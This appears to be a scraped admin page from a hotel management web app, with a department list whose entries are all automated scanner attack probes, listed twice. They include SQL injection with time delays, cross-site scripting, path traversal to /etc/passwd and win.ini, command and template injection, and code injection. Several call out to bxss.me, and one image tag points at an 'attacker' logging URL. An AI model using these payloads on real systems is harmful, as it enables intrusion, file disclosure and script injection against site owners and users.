هتل

	ردیف	نام دپارتمان	عملیات
	1	1MxFcEdeO
	2	response.write(9864895*9960401)
	3	'+response.write(9864895*9960401)+'
	4	"+response.write(9864895*9960401)+"
	5	/../../../../../../../../../../windows/system32/BITSADMIN.exe
	6	7PLkEmk5
	7	../../../../../../../../../../../../../../etc/passwd
	8	echo sjebji$()\ cfxpoi\nz^xyu\|\|a #' &echo sjebji$()\ cfxpoi\nz^xyu\|\|a #\|" &echo sjebji$()\ cfxpoi\nz^xyu\|\|a #
	9	../../../../../../../../../../../../../../windows/win.ini
	10	C:\WINDOWS\system32\drivers\etc\hosts
	11	%0abcc:009247.1400-11280.1400.87715.20235.2@bxss.me
	12	&echo zfklcl$()\ jyaror\nz^xyu\|\|a #' &echo zfklcl$()\ jyaror\nz^xyu\|\|a #\|" &echo zfklcl$()\ jyaror\nz^xyu\|\|a #
	13	to@example.com>%0d%0abcc:009247.1400-11281.1400.87715.20235.2@bxss.me
	14	../../../../../../../../../../windows/win.ini%00.jpg
	15	\|echo kaoukl$()\ hyklmw\nz^xyu\|\|a #' \|echo kaoukl$()\ hyklmw\nz^xyu\|\|a #\|" \|echo kaoukl$()\ hyklmw\nz^xyu\|\|a #
	16	(nslookup hitqfzjobullg1363d.bxss.me\|\|perl -e "gethostbyname('hitqfzjobullg1363d.bxss.me')")
	17	/../../../../../../../../../../boot.ini
	18	<esi:include src="http://bxss.me/rpb.png"/>
	19	$(nslookup hitolfblrzzej79e36.bxss.me\|\|perl -e "gethostbyname('hitolfblrzzej79e36.bxss.me')")
	20	12345'"\'\");\|]*%00{%0d%0a<%00>%bf%27'💡
	21	%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
	22	&(nslookup hitmytfsphkqeec7ab.bxss.me\|\|perl -e "gethostbyname('hitmytfsphkqeec7ab.bxss.me')")&'\"`0&(nslookup hitmytfsphkqeec7ab.bxss.me\|\|perl -e "gethostbyname('hitmytfsphkqeec7ab.bxss.me')")&`'
	23	..\..\..\..\..\..\..\..\windows\win.ini
	24	${9999896+9999025}
	25	..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
	26	\|(nslookup hitsfnozbidlh72ac7.bxss.me\|\|perl -e "gethostbyname('hitsfnozbidlh72ac7.bxss.me')")
	27	/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
	28	`(nslookup hityddttzfhbv9f7ff.bxss.me\|\|perl -e "gethostbyname('hityddttzfhbv9f7ff.bxss.me')")`
	29	../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
	30	&n952343=v978932
	31	../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
	32	WEB-INF/web.xml
	33	http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
	34	WEB-INF\web.xml
	35	1some_inexistent_file_with_long_name%00.jpg
	36	)
	37	'.gethostbyname(lc('hitng'.'gblywdnvd299d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(83).chr(105).chr(79).'
	38	!(()&&!\|\|\|
	39	Http://bxss.me/t/fit.txt
	40	".gethostbyname(lc("hitai"."sipsgtfr920ba.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(80).chr(107).chr(66)."
	41	http://bxss.me/t/fit.txt%3F.jpg
	42	^(#$!@#$)(()))******
	43	/etc/shells
	44	c:/windows/win.ini
	45	"+"A".concat(70-3).concat(22*4).concat(113).concat(86).concat(122).concat(85)+(require"socket" Socket.gethostbyname("hitdf"+"azcqnsil6c635.bxss.me.")[3].to_s)+"
	46	'+'A'.concat(70-3).concat(22*4).concat(103).concat(86).concat(116).concat(87)+(require'socket' Socket.gethostbyname('hitgl'+'kvuititcf3252.bxss.me.')[3].to_s)+'
	47	bxss.me
	48	)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
	49	/xfs.bxss.me
	50	'"
	51	<!--
	52	1'"()&%<acx><ScRiPt >jyXM(9579)</ScRiPt>
	53	'"()&%<acx><ScRiPt >jyXM(9196)</ScRiPt>
	54	19110049
	55	acu7033%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca7033
	56	acux9890%C0%BEz1%C0%BCz2a%90bcxuca9890
	57	<%={{={@{#{${acx}}%>
	58	1
	59	<th:t="${acx}#foreach
	60	1
	61	1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
	62	1
	63	acx{{98991*97996}}xca
	64	acx[[${98991*97996}]]xca
	65	acx__${98991*97996}__::.x
	66	"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
	67	1<ScRiPt >jyXM(9012)</ScRiPt>
	68	1<W0DYRP>FWKUS[!+!]</W0DYRP>
	69	1<script>jyXM(9217)</script>
	70	1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%6A%79%58%4D%28%39%33%36%31%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
	71	1<ScRiPt >jyXM(9545)</ScRiPt>
	72	1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9879></ScRiPt>
	73	1<ScRiPt >jyXM(9230)</ScRiPt>
	74	;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
	75	';print(md5(31337));$a='
	76	1<isindex type=image src=1 onerror=jyXM(9945)>
	77	";print(md5(31337));$a="
	78	${@print(md5(31337))}
	79	${@print(md5(31337))}\
	80	1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9037'>
	81	'.print(md5(31337)).'
	82	1<body onload=jyXM(9002)>
	83	HttP://bxss.me/t/xss.html?%00
	84	bxss.me/t/xss.html?%00
	85	1<img src=//xss.bxss.me/t/dot.gif onload=jyXM(9356)>
	86	1<img src=xyz OnErRor=jyXM(9449)>
	87	1<img/src=">" onerror=alert(9255)>
	88	%31%3C%53%63%52%69%50%74%20%3E%6A%79%58%4D%289837%29%3C%2F%73%43%72%69%70%54%3E
	89	1\u003CScRiPt\jyXM(9038)\u003C/sCripT\u003E
	90	1<ScRiPt>jyXM(9871)</sCripT>
	91	1<input autofocus onfocus=jyXM(9761)>
	92	<a HrEF=http://xss.bxss.me></a>
	93	<a HrEF=jaVaScRiPT:>
	94	1}body{acu:Expre/**/SSion(jyXM(9629))}
	95	1yHTEU <ScRiPt >jyXM(9894)</ScRiPt>
	96	1<W3RTOZ>OSP58[!+!]</W3RTOZ>
	97	1<ifRAme sRc=9127.com></IfRamE>
	98	1<aWu1MCf x=9608>
	99	1<img sRc='http://attacker-9376/log.php?
	100	1<a6aCeFM<
	101	1
	102	1
	103	UT12UWCC
	104	-1 OR 2+14-14-1=0+0+0+1 --
	105	-1 OR 2+956-956-1=0+0+0+1
	106	-1' OR 2+571-571-1=0+0+0+1 --
	107	-1' OR 2+421-421-1=0+0+0+1 or 'r7aoJ9Bs'='
	108	-1" OR 2+278-278-1=0+0+0+1 --
	109	if(now()=sysdate(),sleep(15),0)
	110	0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
	111	0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
	112	(select(0)from(select(sleep(15)))v)/'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"/
	113	-1; waitfor delay '0:0:15' --
	114	-1); waitfor delay '0:0:15' --
	115	-1)); waitfor delay '0:0:15' --
	116	1 waitfor delay '0:0:15' --
	117	Kr0EG6So'; waitfor delay '0:0:15' --
	118	DZp3Fj99'); waitfor delay '0:0:15' --
	119	rIZUCNIK')); waitfor delay '0:0:15' --
	120	-5 OR 35=(SELECT 35 FROM PG_SLEEP(15))--
	121	-5) OR 386=(SELECT 386 FROM PG_SLEEP(15))--
	122	-1)) OR 362=(SELECT 362 FROM PG_SLEEP(15))--
	123	UanlJUeh' OR 682=(SELECT 682 FROM PG_SLEEP(15))--
	124	mSXt8U5S') OR 938=(SELECT 938 FROM PG_SLEEP(15))--
	125	dy5ICRoy')) OR 519=(SELECT 519 FROM PG_SLEEP(15))--
	126	1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)\|\|CHR(99)\|\|CHR(99),15)
	127	1'\|\|DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)\|\|CHR(98)\|\|CHR(98),15)\|\|'
	128	1'"
	129	@@hXUz4

1

1MxFcEdeO

2

response.write(9864895*9960401)

3

'+response.write(9864895*9960401)+'

4

"+response.write(9864895*9960401)+"

5

/../../../../../../../../../../windows/system32/BITSADMIN.exe

6

7PLkEmk5

7

../../../../../../../../../../../../../../etc/passwd

8

echo sjebji$()\ cfxpoi\nz^xyu||a #' &echo sjebji$()\ cfxpoi\nz^xyu||a #|" &echo sjebji$()\ cfxpoi\nz^xyu||a #

9

../../../../../../../../../../../../../../windows/win.ini

10

C:\WINDOWS\system32\drivers\etc\hosts

11

%0abcc:009247.1400-11280.1400.87715.20235.2@bxss.me

12

&echo zfklcl$()\ jyaror\nz^xyu||a #' &echo zfklcl$()\ jyaror\nz^xyu||a #|" &echo zfklcl$()\ jyaror\nz^xyu||a #

13

to@example.com>%0d%0abcc:009247.1400-11281.1400.87715.20235.2@bxss.me

14

../../../../../../../../../../windows/win.ini%00.jpg

15

|echo kaoukl$()\ hyklmw\nz^xyu||a #' |echo kaoukl$()\ hyklmw\nz^xyu||a #|" |echo kaoukl$()\ hyklmw\nz^xyu||a #

16

(nslookup hitqfzjobullg1363d.bxss.me||perl -e "gethostbyname('hitqfzjobullg1363d.bxss.me')")

17

/../../../../../../../../../../boot.ini

18

<esi:include src="http://bxss.me/rpb.png"/>

19

$(nslookup hitolfblrzzej79e36.bxss.me||perl -e "gethostbyname('hitolfblrzzej79e36.bxss.me')")

20

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

21

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

22

&(nslookup hitmytfsphkqeec7ab.bxss.me||perl -e "gethostbyname('hitmytfsphkqeec7ab.bxss.me')")&'\"`0&(nslookup hitmytfsphkqeec7ab.bxss.me||perl -e "gethostbyname('hitmytfsphkqeec7ab.bxss.me')")&`'

23

..\..\..\..\..\..\..\..\windows\win.ini

24

${9999896+9999025}

25

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

26

|(nslookup hitsfnozbidlh72ac7.bxss.me||perl -e "gethostbyname('hitsfnozbidlh72ac7.bxss.me')")

27

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

28

`(nslookup hityddttzfhbv9f7ff.bxss.me||perl -e "gethostbyname('hityddttzfhbv9f7ff.bxss.me')")`

29

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

30

&n952343=v978932

31

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

32

WEB-INF/web.xml

33

http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

34

WEB-INF\web.xml

35

1some_inexistent_file_with_long_name%00.jpg

36

)

37

'.gethostbyname(lc('hitng'.'gblywdnvd299d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(83).chr(105).chr(79).'

38

!(()&&!|*|*|

39

Http://bxss.me/t/fit.txt

40

".gethostbyname(lc("hitai"."sipsgtfr920ba.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(80).chr(107).chr(66)."

41

http://bxss.me/t/fit.txt%3F.jpg

42

^(#$!@#$)(()))******

43

/etc/shells

44

c:/windows/win.ini

45

"+"A".concat(70-3).concat(22*4).concat(113).concat(86).concat(122).concat(85)+(require"socket" Socket.gethostbyname("hitdf"+"azcqnsil6c635.bxss.me.")[3].to_s)+"

46

'+'A'.concat(70-3).concat(22*4).concat(103).concat(86).concat(116).concat(87)+(require'socket' Socket.gethostbyname('hitgl'+'kvuititcf3252.bxss.me.')[3].to_s)+'

47

bxss.me

48

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

49

/xfs.bxss.me

50

'"

51

<!--

52

1'"()&%<acx><ScRiPt >jyXM(9579)</ScRiPt>

53

'"()&%<acx><ScRiPt >jyXM(9196)</ScRiPt>

54

19110049

55

acu7033%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca7033

56

acux9890%C0%BEz1%C0%BCz2a%90bcxuca9890

57

<%={{={@{#{${acx}}%>

58

1

59

<th:t="${acx}#foreach

60

1

61

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

62

1

63

acx{{98991*97996}}xca

64

acx[[${98991*97996}]]xca

65

acx__${98991*97996}__::.x

66

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

67

1<ScRiPt >jyXM(9012)</ScRiPt>

68

1<W0DYRP>FWKUS[!+!]</W0DYRP>

69

1<script>jyXM(9217)</script>

70

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%6A%79%58%4D%28%39%33%36%31%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

71

1<ScRiPt >jyXM(9545)</ScRiPt>

72

1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9879></ScRiPt>

73

1<ScRiPt >jyXM(9230)</ScRiPt>

74

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

75

';print(md5(31337));$a='

76

1<isindex type=image src=1 onerror=jyXM(9945)>

77

";print(md5(31337));$a="

78

${@print(md5(31337))}

79

${@print(md5(31337))}\

80

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9037'>

81

'.print(md5(31337)).'

82

1<body onload=jyXM(9002)>

83

HttP://bxss.me/t/xss.html?%00

84

bxss.me/t/xss.html?%00

85

1<img src=//xss.bxss.me/t/dot.gif onload=jyXM(9356)>

86

1<img src=xyz OnErRor=jyXM(9449)>

87

1<img/src=">" onerror=alert(9255)>

88

%31%3C%53%63%52%69%50%74%20%3E%6A%79%58%4D%289837%29%3C%2F%73%43%72%69%70%54%3E

89

1\u003CScRiPt\jyXM(9038)\u003C/sCripT\u003E

90

1<ScRiPt>jyXM(9871)</sCripT>

91

1<input autofocus onfocus=jyXM(9761)>

92

93

94

1}body{acu:Expre/**/SSion(jyXM(9629))}

95

1yHTEU <ScRiPt >jyXM(9894)</ScRiPt>

96

1<W3RTOZ>OSP58[!+!]</W3RTOZ>

97

1<ifRAme sRc=9127.com></IfRamE>

98

1<aWu1MCf x=9608>

99

1<img sRc='http://attacker-9376/log.php?

100

1<a6aCeFM<

101

1

102

1

103

UT12UWCC

104

-1 OR 2+14-14-1=0+0+0+1 --

105

-1 OR 2+956-956-1=0+0+0+1

106

-1' OR 2+571-571-1=0+0+0+1 --

107

-1' OR 2+421-421-1=0+0+0+1 or 'r7aoJ9Bs'='

108

-1" OR 2+278-278-1=0+0+0+1 --

109

if(now()=sysdate(),sleep(15),0)

110

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

111

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

112

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

113

-1; waitfor delay '0:0:15' --

114

-1); waitfor delay '0:0:15' --

115

-1)); waitfor delay '0:0:15' --

116

1 waitfor delay '0:0:15' --

117

Kr0EG6So'; waitfor delay '0:0:15' --

118

DZp3Fj99'); waitfor delay '0:0:15' --

119

rIZUCNIK')); waitfor delay '0:0:15' --

120

-5 OR 35=(SELECT 35 FROM PG_SLEEP(15))--

121

-5) OR 386=(SELECT 386 FROM PG_SLEEP(15))--

122

-1)) OR 362=(SELECT 362 FROM PG_SLEEP(15))--

123

UanlJUeh' OR 682=(SELECT 682 FROM PG_SLEEP(15))--

124

mSXt8U5S') OR 938=(SELECT 938 FROM PG_SLEEP(15))--

125

dy5ICRoy')) OR 519=(SELECT 519 FROM PG_SLEEP(15))--

126

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

127

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

128

1'"

129

@@hXUz4

Users

Customers

Projects

No result found

Advanced Search

Search Preferences

Notifications 24 reports

Get Pro Access

Quick Links

Sitemap